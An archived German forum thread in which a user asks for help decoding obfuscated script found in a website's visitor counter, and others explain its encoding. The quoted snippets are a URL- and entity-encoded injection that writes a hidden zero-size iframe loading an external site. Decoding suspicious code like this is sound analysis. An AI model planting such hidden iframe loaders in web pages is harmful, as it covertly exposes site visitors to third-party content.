PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Etwas entschlüssen?



cr00sy
28.02.2011, 01:04
Hallo,

ich habe hier einen kleinen verdacht, worauf ich aber nicht näher eingehen möchte bis ich wirklich weiß was sich hinter diesem Code versteckt. Ich sah auf einer Webseite die in meinem Referer war folgendes in einem Counter:


m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253 Ciframe%2520src%253D%2522%2526%2523104%253B%2526%2 523116%253B%2526%2523116%253B%2526%2523112%253B%25 26%252358%253B%2526%252347%253B%2526%252347%253B%2 526%2523100%253B%2526%2523117%253B%2526%2523103%25 3B%2526%2523111%253B%2526%2523117%253B%2526%252311 6%253B%2526%2523102%253B%2526%2523111%253B%2526%25 23114%253B%2526%252399%253B%2526%2523101%253B%2526 %252346%253B%2526%2523100%253B%2526%2523101%253B%2 522%2520width%253D%25220%2522%2520height%253D%2522 0%2522%2520name%253D%2522SelfAD%2522%253E%253C/iframe%253E%27%3Bd%3Dunescape%28m%29%3Bdocument.wr ite%28d%29%3B%3C/script%3E

und:


m='%3Ciframe%20src%3D%22%26%23104%3B%26%23116%3B%2 6%23116%3B%26%23112%3B%26%2358%3B%26%2347%3B%26%23 47%3B%26%23100%3B%26%23117%3B%26%23103%3B%26%23111 %3B%26%23117%3B%26%23116%3B%26%23102%3B%26%23111%3 B%26%23114%3B%26%2399%3B%26%23101%3B%26%2346%3B%26 %23100%3B%26%23101%3B%22%20width%3D%220%22%20heigh t%3D%220%22%20name%3D%22SelfAD%22%3E%3C/iframe%3E


Für mich sieht es so aus als hätte der Webmaster etwas zu verheimlichen. Weiß jemand wie man dies entschlüsseln kann bzw. kann es jemand entschlüssen?

Mfg.

Lokutos
28.02.2011, 01:12
das sind einfach html (sonder)zeichen ausgeschrieben als html code

& == & etc

google ml danach und dan siehste was bei raus kommt

http://de.selfhtml.org/html/verweise/email.htm

cr00sy
28.02.2011, 01:33
das sind einfach html (sonder)zeichen ausgeschrieben als html code

& == & etc

google ml danach und dan siehste was bei raus kommt

http://de.selfhtml.org/html/verweise/email.htm

Danke!!

breaker
28.02.2011, 20:03
Cross-Site-Scripting..das ist JS mit htmlentities ;)